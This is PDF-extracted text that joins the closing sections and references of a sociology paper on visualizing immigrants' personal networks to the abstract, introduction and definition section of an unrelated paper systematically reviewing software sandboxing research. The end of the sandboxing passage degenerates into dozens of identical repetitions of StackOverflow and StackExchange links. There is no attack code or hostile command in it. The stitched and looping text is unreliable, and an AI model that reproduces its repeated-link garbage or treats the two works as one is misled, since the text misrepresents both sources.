some way the collection of relational data. It is precisely the collection of systematic and ex- haustive information that allows us to capture rela- tional patterns that are not intuitively perceived by the interviewees, generating novel structural information even for them. Some participants resorted to artistic representa- tions. For example, an Erasmus student drew a tree, whereby the central trunk containing the core alters sustains the branches that have emerged through her biographical itinerary (Figure 4, Left). In another case, a Flamenco artist distinguishes between the closest strong relationships that she meets frequently and alters distributed in the different geographical locations in which she has resided (Figure 4, Right). In comparison with these graphs, the analytical visualization is not based on the symbolic value of the representation. However, what is lost in imagery is gained in structure: revealing the underlying struc- ture can have a similar effect, giving the observer a deep insight, the feeling of being able to observe and apprehend the whole picture. Identifying groups and communities through personal networks In a previous study (Cachia and Maya Jariego, 2010), which served as a pretest of the instruments we used in the present investigation, we verified that the visualization of personal networks facilitates the de- tection of social groups and communities in which respondents participates. Specifically, we compared the spontaneous enumeration of significant groups Table 3. Common visualization strategies used in the spontaneous representation of the personal network. Strategy n % Description Groups 56 62.9 The respondent draws a line or a circle in which he/she groups a subset of people belonging to the same category (e.g. “housemates,” “family,” “friends from work,” “flamenco colleagues,” etc.) List of names 27 30.3 The interpersonal environment is summarized through a list of contacts. Names tend to be elicited through association and it is common that contacts with a similar relationship (e.g. siblings) have a close position to each other in the drawing Ego’s star or ego’s tree 20 22.5 It consists of representing ego in the center of the graph and drawing around his direct contacts. Links between alters are rare, if there are any. We have called “relationships tree” those cases in which, from the direct relationship with ego, other branches of indirect relationships emerge Nodes and relationships 10 11.2 A graph is drawn, composed of a set of individual nodes and the relationships they maintain between them Concentric circles 6 6.7 The most important relationships are drawn in the center of the graph and around them concentric circles of decreasing relative importance are shown successively Artistic representation 6 6.7 In some cases, respondents opted for creative drawings to represent metaphorically the characteristics of the personal network Geographical position 4 4.5 Some respondents draw the distribution of their contacts according to the geographical location of alters. For instance, in our study, given it is based on a sample of people who have changed their place of residence, alters were placed between the home country and the host country Diagram or organization chart 4 4.5 A schema is represented that organizes the personal contacts following some system of hierarchical classification, or imitating the structure of an organizational chart Note: In each strategy, we indicate the number and percentage of respondents who used this form of graphic rep- resentation. The same respondent can use several visualization strategies in the same graph. 12 What the eye does not see: visualizations strategies for the data collection of personal network and communities by the respondent with the iden- tification of groups and communities based on the visualization of their personal network. We found that the participants identified 3 times more communities and 1.5 more groups from the analytical visualizations than from the spontaneous drawing. Therefore, a more exhaustive evaluation of the per- sonal network not only reflects its structure in greater detail, but also allows researchers to capture uncon- scious structural properties, that is, those that the in- dividual would be unable to describe spontaneously and intuitively. Returning to the study with the four im- migrant collectives in Seville, it can be easier for the respondents to explain how their relations are distrib- uted in the transnational space by placing the nodes in the different areas that represent the place of habit- Figure 2: Six examples of hand-drawn visualization of personal networks. (A) the respondent has listed names in groups (family, neighbors, etc.). (B) the representation is a star network of ego, in which groups of names have been connected instead of individual nodes. (C) it is a symbolic representation, in which the individual has classified her contacts in three categories. (D) the sun represents the strongest and most significant ties for the respondent, whose light nourishes other relationships that have developed in Holland (the tulips) and in Spain (the daisy flowers). (E) the spiral allows the recognition of three segments of alters, depending on their proximity to ego, which correspond to three levels of relative importance. (F) a network of relationships between individual nodes is divided in ten different groups. List of names, with classification in groups. Ego's star network, with classification in groups. Artistic representation, with classification in groups. Artistic representation, with classification in groups and geographical position. Concentric circles, in three segments of relative importance. Graph (nodes and relationships), with classification in groups. A B C D E F Figure 3: Spontaneous visualization and graphic representations with VennMaker and Ucinet of the personal network of an Erasmus student. 13 CONNECTIONS ual residence of the alters. However, the systematic, analytical and exhaustive collection of relationships not only reduces social desirability but also reveals novel processes for the informants themselves. In- deed, the analytical visualization contributes to the understanding of social structures, notwithstanding that its application as a technique consumes a great deal of time and effort. In this study, we have refrained from asking respondents to enumerate the groups and communities in their visualizations and what we have noted is that intuitively respondents tried to represent alters in different groups. Interestingly, this was more visible in the hand-drawn visualizations. Respondents used various techniques to group peo- ple together, varying from drawing people together in one space, using squares and lists and using cir- cles, amongst others. A major advantage of using a blank paper for visualizations is that respondents are free to represent their networks as they like, without any restriction. In this respect, this type of visualiza- tion seems to correspond better to how respondents perceive their networks and the structural features of the network are simplified. The richness of the structural data of the automated visualizations was a novel aspect in re- spondents’ network. Many were pleasantly surprised to see their automated visualization prompting them to comment on different aspects of the relations. For instance, they would comment that they were not aware that a particular group in their network was so closely-knit or that some alters hardly knew any- one in their network. There were instances, were the detection of groups became clearly visible when the relations were added to the network (see Figure 5). If we look at the two visualizations, we observe how in the automated visualization (on the right), four groups clearly emerge from the visualization, some- thing which was not easily detectable in the sponta- neous drawing. Moreover, the respondent could also observe how one of the groups is very densely con- nected, a characteristic which is not visible at all in the free-hand drawing. Figure 4: Symbolic representations of the personal network. Figure 5: Spontaneous drawing and the automated visualization by an Erasmus student. 14 What the eye does not see: visualizations strategies for the data collection of personal network It was also interesting to observe that the transnational dimension was often depicted in a great variety of the networks. The transnational spaces can be easily identifiable in the way the network is drawn or constructed. In this respect, we have often observed similarities in terms of network structure in the way networks are drawn and the automated ver- sion. The major difference between the two types of visualizations lies in the relations. In the spontaneous drawing, respondents tend to simplify the connec- tions, using various techniques. In this respect, in this study we have observed that while some structural features of the network are of- ten visible in the hand-drawn visualization, the global structure of the network remains concealed and only becomes visible through an automated visualization. In Figure 6, we can note how the automated visual- ization (right) illustrates a highly dense group, which would have not been detected through the sponta- neous drawing. In contrast, the clear division of the groups is more visible in the hand-drawn visualiza- tions. The analytical representation helps to become aware of the general structural properties. Discussion In this paper, we have shown two ways how to use network visualization in data collection. On the one hand, as a generator of names and relationships, the graphic representation acts as a facilitator that reduc- es the perceived load in the information collection process. On the other hand, as a device for request- ing qualitative interpretations, visualization allows ob- taining biographical information and the identification of natural interaction contexts. In both cases, it works efficiently in the description of transnational spaces and organizing relationships by socio-geographical areas. As found by Ryan and D’Angelo (2018) when using sociograms in their longitudinal research on mi- grants, visualizations prompted respondents to dis- cuss issues related to identity and their changing self through time, instead of simply checking how many ties have changed or remained. The advantages of using computer-based net- work visualization in the data collection are numer- ous. A depiction of complex structures is easily made comprehensible, helping both respondent and inter- viewer (Gamper et al., 2012). Through digital network visualizations it is much easier for the interviewee to identify errors in their network. These advantages are confirmed when compared to the spontaneous representations of the personal network (McCarty et al., 2007). Computer-based network visualizations rendered important details that were different from respondents’ perceptions of what they had originally drawn, for example, allowing respondents to com- partmentalize alters of different ethnicities. However, visualization strategies have some limi- tations in the systematic collection of information of the dyad relations. While name generators with a ma- trix of alters force the interviewee to be disciplined in the evaluation of the dyads one by one, with graphic devices there is a tendency to focus on the overall vision of the relationships. We have seen this when comparing hand drawings of personal networks with the elaboration of traditional graphs. This is consist- ent with the value attributed to the technique of name generators when a valid and reliable measure of the size of an individual’s personal network is sought (Hogan et al., 2007). Figure 6: Spontaneous drawing and the automated visualization by a partner of a worker of the European Commission. 15 CONNECTIONS In the spontaneous representation (through free- hand drawing), participants frequently resort to the identification of social groups (which sometimes reflect the main contexts of interaction in which the individu- al participates, or significant subsets of their personal network, for example in function of the type of rela- tionship). In our case study, referring to the transna- tional space, the groups are usually organized in two or more geographical areas. Some drawings also rec- ognize partial approaches to a network, either with a list of names, with a graph in the form of a star around ego, or with nodes and relations drawn in a non-sys- tematic way. The preference for the use of group cate- gories had previously been observed with samples of university students and immigrants (Maya Jariego and Holgado, 2005; McCarty et al., 2007). In the context of transnational mobility, becoming aware and under- standing the structure of the social support network may be highly significant and is clearly associated with psychological adaptation during relocation. In contrast, analytical visualizations generate a more detailed representation, which reveals structural patterns that are not intuitively evident to the partici- pants. That is, it serves to identify unconscious rela- tional phenomena, such as belonging to communities or participation in social circles. This highlights the beneficial use of network analysis in the study of the psychological sense of community, social cohesion and community integration processes (Maya-Jariego, 2004). In our study, it was interesting to verify that the groups with which the individual has a direct relation- ship (which are usually represented in the personal network), are an efficient means to detect the commu- nities of indirect relationships of which they are a part. Resorting to visualization during data collection has great advantages in terms of reducing partici- pant burden and time. On the other hand, the ver- satile nature of visualizations provides an enormous potential to integrate it with the objectives of each specific investigation. It is a strategy that seems to coincide with the mechanisms of perception of the social world (Brands and Mehra, 2019; Mehra et al., 2014): for participants it is natural to represent their relationships on a map or “read“ the graphic rep- resentation of their personal network. In addition, it allows them to concentrate on the fundamental properties of their interpersonal space, considering the entire configuration (which entails certain degree of simplification). In some cases, “Gestalt” has been identified as a subjective approach followed by indi- viduals in the description of their networks (Von der Lippe and Gamper, 2017). This shows that complet- ing a matrix in a traditional name generator requires a different type of cognitive processing from the visual representation of relationships during the interview process. The analytical approach is less intuitive and more expensive, both for the interviewer and for the interviewee. However, within this limitation lies its vir- tue, since the unconscious ways of obtaining ties and relationships not only reduce the social desirability of the information obtained but also may eventually gen- erate structures that are a surprise even for inform- ants. The analytical approach sometimes makes visi- ble what the eye does not see. Conclusions In this paper we have reviewed different strategies of visual representation of the networks, together with the contributions and limitations that each of them en- tails. The visualization can be based on a spontaneous drawing, without restrictions; in a computer-assisted interactive interview, or in analytical data collection through a name generator and an adjacency matrix. Each approach has its advantages and disadvantages. Depending on the objective of the study, the researcher should choose what type of visualization to use, keep- ing in mind, that the type of visualization could mean obliterating some data. For instance, in this study we have shown that an automated visualization is a better tool if the researcher is interested in the global structur- al features of the network. On the other hand, a hand- drawn visualization would be more apt if the researcher is trying to understand how interviewees perceive their network, given the unstructured approach allows them to depict their network freely, without any template of automated visualizations. In fact, the combination of strategies can help to counteract some of the limita- tions and generate new types of data. Through the study of the transnational relations of four groups of foreigners living in Seville, we have verified the natural tendency to simplify the social world in social categories (referred to as groups of belonging), as well as the specific value of analytical displays, which allow to go beyond the cognitive ca- pacity of the individual on his space of relations: • The description of interpersonal space through social groups is an intuitive strategy, which the respondents use both when they draw their personal network spontaneously and when they are asked to give meaning to a socio- gram. The categories are a central element in the processes of social perception. • However, analytical graphs detect structural patterns that are not intuitively evident, facilitat- ing the description of social circles and com- munities of belonging. 16 What the eye does not see: visualizations strategies for the data collection of personal network References Agneessens, F., Waege, H. and Lievens, J. (2002). Social support typologies: different approaches for reducing social support data. Developments in Social Science Methodology, 18: 73–94. Antonucci, T. (1986). Hierarchical mapping technique: Measuring social support networks. Gener- ations, 10(4): 10–12. Barrera, M. (1980). A method for the assessment of social support networks in community survey re- search. Connections, 3(3): 8–13. Bastian, M., Heymann, S. and Jacomy, M. (2009). Gephi: an open source software for exploring and ma- nipulating networks. paper presented at the Internation- al Conference on Web and Social Media, available at: https://gephi.org/publications/gephi-bastian-feb09.pdf San Jose, California, May 17–20, 2009. Published by The AAAI Press, Menlo Park, California. Bidart, C. and Charbonneau, J. (2011). How to gen- erate personal networks: issues and tools for a socio- logical perspective. Field Methods, 23(3): 266–286. Brands, R. A. and Mehra, A. (2019). Gender, bro- kerage, and performance: a construal approach. Academy of Management Journal, 62(1): 196–219. Burt, R. S. (1984). Network items and the general social survey. Social Networks, 6(4): 293–339. Cachia, R. and Maya Jariego, I. (2010). Eliciting communities from personal network visualisations: ties, groups and communities . paper presented at In- ternational Network for Social Network Analysis: Sun- belt XXX., Trento. Cachia, R. and Maya-Jariego, I. (2018). Mobility types, transnational ties and personal networks in four highly skilled immigrant communities in Seville (Spain). Social Networks, 53: 111–124. Carrasco, J. A., Hogan, B., Wellman, B. and Miller, E. J. (2006). Collecting social network data to study so- cial activity-travel behaviour: an egocentric approach. paper presented at the 85th Transportation Research Board Meeting, Washington, DC. Cheong, L., Armour, C. and Bosnic-Anticevich, S. (2013). Primary health care teams and the patient per- spective: a social network analysis. Research in social and administrative pharmacy, 9(6): 741–757. den Besten, O. (2010). Local belonging and ‘geog- raphies of emotions’: immigrant children’s experience of their neighbourhoods in Paris and Berlin. Childhood, 17(2): 181–195. Domínguez, S. and Maya-Jariego, I. (2008). Acculturation of Host Individuals: Immigrants and Personal Networks. American Journal of Community Psychology, 42(3): 309–327. Dunbar, R. I. M. and Spoors, M. (1995). Social net- works, support cliques, and kinship. Human Nature, 6(3): 273–290. Eddens, K. and Fagan, J. M. (2018). Comparing nascent approaches for gathering alter-tie data for egocentric studies. Social Networks, 55: 130–141. Eddens, K., Fagan, J. M. and Collins, T. (2017). An interactive, mobile-based tool for personal social network data collection and visualization among a geographically isolated and socioeconomically disad- vantaged population: early-stage feasibility study with qualitative user feedback. JMIR Research Protocols, 6(6): e124. Fischer, C. S. (1982), To Dwell Among Friends: Per- sonal Networks In Town And City, University of Chicago Press, Chicago, IL. Freeman, L. C. (2000). Visualizing social networks. Journal of Social Structure, 1(1). Freeman, L. C. (2004). The Development of Social Network Analysis. A Study in the Sociology of Science. Empirical Press, Vancouver, BC. Fu, Y. C. (2005). Measuring personal networks with daily contacts: a single-item survey question and the contact diary. Social Networks, 27(3): 169–186. Gamper, M., Schönhuth, M. and Kronenwett, M. (2012). Bringing qualitative and quantitative data together: collecting network data with the help of the software tool VennMaker. in Safar, M. and Mahdi, K. (Eds), Social Networking and Community Behavior Modeling: Qualitative and Quantitative Measures, Hershley, PA: 193–213. Bielefeld (Germany). Hersberger, J. (2003). A qualitative approach to ex- amining information transfer via social networks among homeless populations. The New Review of Information Behaviour Research, 4(1): 95–108. Hogan, B., Carrasco, J. A. and Wellman, B. (2007). Visualizing personal networks: working with partici- pant-aided sociograms. Field Methods, 19(2): 116–144. Kahn, R. L. and Antonucci, T. (1984). Supports of the elderly: family/friends/professionals. Final report to the National Institute on Aging Bethesda, MD. Killworth, P. D., Johnsen, E. C., Bernard, H. R., Ann Shelley, G. and McCarty, C. (1990). Estimating the size of personal networks. Social Networks, 12(4): 289–312. Lubbers, M. J., Molina, J. L. and McCarty, C. (2007). Personal networks and ethnic identifications. International Sociology, 22(6): 721–741. McCallister, L. and Fischer, C. S. (1978). A proce- dure for surveying personal networks. Sociological Methods & Research, 7(2): 131–148. 17 CONNECTIONS McCarty, C. (2002). Structure in personal networks. Journal of Social Structure, 3(1). McCarty, C. and Govindaramanujam, S. (2005). A modified elicitation of personal networks using dynamic visualization. Connections, 26(2): 61–69. McCarty, C., Killworth, P. D., Bernard, R., Johnsen, E. C. and Shelley, G. A. (2001). Comparing two meth- ods for estimating network size. Human Organization, 20(1): 28–39. McCarty, C., Molina, J. L., Aguilar, C. and Rota, L. (2007). A comparison of social network mapping and personal network visualization. Field Methods, 19(2): 145–162. Marin, A. (2004). Are respondents more likely to list alters with certain characteristics? Implications for name generator data. Social Networks, 26(4): 289–307. Marin, A. and Hampton, K. N. (2007). Simplifying the personal network name generator. Field Methods, 19(2): 163–193. Maya Jariego, I. and Holgado, D. (2005). Lazos fuertes y proveedores múltiples de apoyo: com- paración de dos formas de representación gráfica de las redes personales. Empiria: Revista de metodología de ciencias sociales, 10: 107–127. Maya-Jariego, I. (2016). 7 usos del análisis de redes en la intervención comunitaria. REDES. Revista His- pana para el Análisis de Redes Sociales, 27(2): 1–10. Maya Jariego, I. (2018). Why name generators with a fixed number of alters may be a pragmatic option for personal network analysis. American Journal of Com- munity Psychology, 62(1–2): 233–238. Maya-Jariego, I., & Armitage, N. (2007). Multiple senses of community in migration and commuting: The interplay between time, space and relations. Interna- tional Sociology, 22(6): 743–766. Maya-Jariego, I. (2004). Sentido de comunidad y potenciación comunitaria. Apuntes de Psicología, 22(2): 187–211. Brass, D., Labianca, G., Mehra, A., Halgin, D., and Borgatti, S. P. (2014). Imaginary worlds: using visual network scales to capture perceptions of social net- works. Contemporary Perspectives on Organizational Social Networks, Emerald Group Publishing: 315–336. Bradford (United Kingdom). Milardo, R. M. (1992). Comparative methods for delineating social networks. Journal of Social and Per- sonal Relationships, 9(3): 447–461. Moreno, J. L. (1934). Who shall survive? A new ap- proach to the problem of human interrelations. Nervous and Mental Disease Monograph Series No 58, Nervous and Mental Disease Publishing, Washington, DC. Moreno, J. L. (1953). Who shall survive? Foun- dations of sociometry, group psychotherapy and socio-drama, 2nd ed., Beacon House, Oxford. Pearce, J. and Milne, E. J. (2010). Participation and community on Bradford’s traditionally white estates: a community research project. available at: http://www. jrf.org.uk/sites/files/jrf/Bradford-participation-commu- nity-full.pdf. Retrieved: December 21, 2018. Pool, I. S. and Kochen, M. (1978). Contacts and influence. Social Networks, 1(1): 5–51. Ratti, C., Frenchman, D., Pulselli, R. M., and Williams, S. (2006). Mobile landscapes: using location data from cell phones for urban analysis. Environment and Planning B: Planning and Design, 33(5): 727–748. Reyes, C. (2016). Eliciting data on social relation- ships: the use of hand-drawn network maps in tracing the perception of digitally mediated social ties. Interna- tional Review of Social Research, 6(4): 256–268. Roberts, S. G. B., Dunbar, R. I. M., Pollet, T. V. and Kuppens, T. (2009). Exploring variation in active net- work size: constraints and ego characteristics. Social Networks, 31(2): 138–146. Roberts, S. G. B., Wilson, R., Fedurek, P. and Dunbar, R. I. M. (2008). Individual differences and per- sonal social network size and structure. Personality and Individual Differences, 44(4): 954–964. Ryan, L. and D’Angelo, A. (2018). Changing times: migrants’ social network analysis and the challenges of longitudinal research. Social Networks, 53: 148–158. Ryan, L., Mulholland, J. and Agoston, A. (2014). Talk- ing ties: reflecting on network visualisation and qualitative interviewing. Sociological Research Online, 19(2, avail- able at http://www.socresonline.org.uk/19/2/16.html. Retrieved: December 21, 2018. Samuelsson, M., Thernlund, G. and Ringstrom, J. (1996). Using the five field map to describe the social network of children: a methodological study. Internation- al Journal of Behavioral Development, 19(2): 327–346. Schiffer, E. and Hauck, J. (2010). Net-map: collecting social network data and facilitating network learning through participatory influence network map- ping. Field Methods, 22(3): 231–249. Schönhuth, M., Kronenwett, M., Gamper, M. and Stark, M. (2012). Vennmaker 1.5. available at http:// www.vennmaker.com Retrieved: December 21, 2018. Tubaro, P., Casilli, A. A. and Mounier, L. (2014). Elic- iting personal network data in web surveys through participant-generated sociograms. Field Methods, 26(2): 107–125. van der Poel, M. G. M. (1993). Delineating personal support networks. Social Networks, 15(1): 49–70. 18 What the eye does not see: visualizations strategies for the data collection of personal network Vehovar, V., Lozar Manfreda, K., Koren, G. and Hlebec, V. (2008). Measuring ego-centered social net- works on the web: questionnaire design issues. Social Networks, 30(3): 213–222. von der Lippe, H., & Gamper, M. (2017). Drawing or tabulating ego-centered networks? A mixed-methods comparison of questionnaire vs. visualization-based data collection. International Journal of Social Re- search Methodology, 20(5): 425–441. Wellman, B. (1979). The community question: the intimate networks of East Yorkers. American Journal of Community Psychology, 84(5): 1201–1231. Wellman, B. (2007). The network is personal: intro- duction to a special issue of Social networks. Social Networks, 29(3): 349–356. Wellman, B. and Wortley, S. (1990). Different strokes from different folks: community ties and social support. American Journal of Sociology, 96(3): 558–588. work_dzeata5onzf7rp26j2quaotjza ---- A systematic analysis of the science of sandboxing Submitted 15 October 2015 Accepted 28 December 2015 Published 27 January 2016 Corresponding author Michael Maass, mmaass@andrew.cmu.edu Academic editor Cynthia Irvine Additional Information and Declarations can be found on page 29 DOI 10.7717/peerj-cs.43 Copyright 2016 Maass et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS A systematic analysis of the science of sandboxing Michael Maass1, Adam Sales2, Benjamin Chung1 and Joshua Sunshine1 1 Institute for Software Research, School of Computer Science, Carnegie Mellon University, Pittsburgh, PA, United States 2 Statistics Department, Carnegie Mellon University, Pittsburgh, PA, United States ABSTRACT Sandboxes are increasingly important building materials for secure software systems. In recognition of their potential to improve the security posture of many systems at various points in the development lifecycle, researchers have spent the last several decades developing, improving, and evaluating sandboxing techniques. What has been done in this space? Where are the barriers to advancement? What are the gaps in these efforts? We systematically analyze a decade of sandbox research from five top-tier security and systems conferences using qualitative content analysis, statistical clustering, and graph-based metrics to answer these questions and more. We find that the term “sandbox” currently has no widely accepted or acceptable definition. We use our broad scope to propose the first concise and comprehensive definition for “sandbox” that consistently encompasses research sandboxes. We learn that the sandboxing landscape covers a range of deployment options and policy enforce- ment techniques collectively capable of defending diverse sets of components while mitigating a wide range of vulnerabilities. Researchers consistently make security, performance, and applicability claims about their sandboxes and tend to narrowly define the claims to ensure they can be evaluated. Those claims are validated using multi-faceted strategies spanning proof, analytical analysis, benchmark suites, case studies, and argumentation. However, we find two cases for improvement: (1) the arguments researchers present are often ad hoc and (2) sandbox usability is mostly uncharted territory. We propose ways to structure arguments to ensure they fully support their corresponding claims and suggest lightweight means of evaluating sandbox usability. Subjects Security and Privacy, Operating Systems, Software Engineering Keywords Sandboxing, Qualitative content analysis, Software protection, Access control, Security, Security validation INTRODUCTION Sandboxes can be found where software components must be used but cannot currently be verified or trusted. Sandboxed components are often feared to be either malicious or vulnerable to attack. For example, popular browser engines (e.g., Google Chrome and Internet Explorer), productivity software (e.g., Microsoft Word and Adobe Reader), and operating system kernels (e.g., Windows 8) have all been sandboxed to varying degrees. Virtual machines, which run software on simulated hardware separate from the rest of the How to cite this article Maass et al. (2016), A systematic analysis of the science of sandboxing. PeerJ Comput. Sci. 2:e43; DOI 10.7717/peerj-cs.43 mailto:mmaass@andrew.cmu.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.43 http://dx.doi.org/10.7717/peerj-cs.43 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.43 host system, are commonly used in malware analysis to contain malicious computations (e.g., Cuckoo) and sandboxes are used in mobile ecosystems (e.g., Android) to limit the havoc malicious applications can wreak on a device. Sandboxes provide some salvation in a world full of complex components: instead of vetting intractably enigmatic software systems, sandbox them and vet the relatively simple sandbox. What else do sandboxes in mainstream use have in common? They are largely dependent on relatively easily composed coarse-grained operating system features, they are essentially transparent to the users of sandboxed components, and they make little use of decades worth of research produced within the domain of software security sandboxing. Researchers have spent the last several decades building sandboxes capable of containing computations ranging from fully featured desktop applications to subsets of nearly every kind of application in existence, from third party libraries in Java programs to ads on web sites. Sandboxes have been built to stop memory corruption exploits, ensure control- and data-flow integrity, enforce information flow constraints, introduce diversity where monocultures previously existed, and much more. What more can the community do to bring value? In this paper, we use multidisciplinary techniques from software engineering, statistics, the social sciences, and graph analysis to systematically analyze the sandboxing landscape as it is reflected by five top-tier security and systems conferences. We aim to answer questions about what sandboxes can already do, how they do it, what it takes to use them, what claims sandbox inventors make about their creations, and how those claims are validated. We identify and resolve ambiguity in definitions for “sandbox”, systematize ten years of sandbox research, and point out gaps in our current practices and propose ways forward in resolving them. We contribute the following: • A multi-disciplinary methodology for systematically analyzing the state of practice in a research domain (‘Methodology’). • The first concise definition for “sandbox” that consistently describes research sandboxes (‘What is a Sandbox’). • Systemization of the research sandboxing landscape (‘Results’). • Identification of and proposed solutions to (1) an over-reliance on ad hoc arguments for security validation and (2) the neglect of sandbox and policy usability (‘Strengthening Sandboxing Results’). WHAT IS A SANDBOX? In order to systematically analyze the “sandboxing” landscape we need to clarify the meaning of the term. We reviewed definitions used by practitioners and in papers within the field, both in the substance of the definitions and in their quality as definitions. This section reviews those definitions and establishes a definition for our use here, which we advance as an improved definition for the field. A definition should be a concise statement of the exact meaning of a word and may be accompanied by narration of some properties implied by the definition. In this case, it Maass et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.43 2/36 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.43 should clearly distinguish between mechanisms that are and are not sandboxes. To gain widespread use, a new definition must include all mechanisms that are already widely considered to be sandboxes. In software security contexts, the term “sandboxing” has grown ambiguous. In an early published use, it described an approach for achieving fault isolation (Wahbe et al., 1993). Discussions where practicing programmers are trying to understand what sandboxing is often fail to achieve a precise resolution and instead describe the term by listing products that are typically considered to be sandboxes or cases where sandboxes are often used (http://stackoverflow.com/questions/2126174/what-is-sandboxing, http://security. stackexchange.com/questions/16291/are-sandboxes-overrated, http://en.wikipedia.org/ w/index.php?title=Sandbox (computer security)&oldid=596038515). However, we did find cases where attempts were made at a concise and general definition. A representative and accepted StackOverflow answer (http://security.stackexchange.com/questions/5334/ what-is-sandboxing) started with, “In the context of IT security, ‘sandboxing’ means isolating some piece of software in such a way that whatever it does, it will not spread havoc elsewhere”—a definition that is not sufficiently precise to separate sandboxes from other defensive measures. Even recently published surveys of sandbox literature have either acknowledged the ambiguity, then used overly-broad definitions that include mechanisms not traditionally considered to be sandboxes (Schreuders, McGill & Payne, 2013), or have relied entirely on the use of examples instead of a precise definition (Al Ameiri & Salah, 2011). Schreuders writes, “Although the terminology in use varies, in general a sandbox is separate from the access controls applied to all running programs. Typically sandboxes only apply to programs explicitly launched into or from within a sandbox. In most cases no security context changes take place when a new process is started, and all programs in a particular sandbox run with the same set of rights. Sandboxes can either be permanent where resource changes persist after the programs finish running, or ephemeral where changes are discarded after the sandbox is no longer in use. . . . ” This definition suffers from three problems. First, it is still overly reliant on examples and thus is unlikely to capture all security mechanisms that are uncontroversially called sandboxes. Along the same lines, characterizations prefaced with, “In most cases . . . ”, are not precise enough to reliably separate sandboxes from non-sandboxes. Finally, the comparison to access controls is not conclusive because it does not clarify which, if any, access control mechanisms applied to a subset of running programs are not sandboxes. In this section we aim to resolve this ambiguity to lay the groundwork for our analysis’s inclusion criteria. While this definition serves our purposes, we believe it can strengthen future attempts to communicate scientifically about sandboxes by adding additional precision. We derive a clear, concise definition for what a “sandbox” is using papers that appear in five top-tier security and operating system conferences, selected because their topics of interest are broad enough to include sandboxing papers most years. While we do not attempt to thoroughly validate our definition using commercial and open source sandboxes, it does encompass the tools with which we are most familiar. Maass et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.43 3/36 https://peerj.com/computer-science/ http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://stackoverflow.com/questions/2126174/what-is-sandboxing http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated 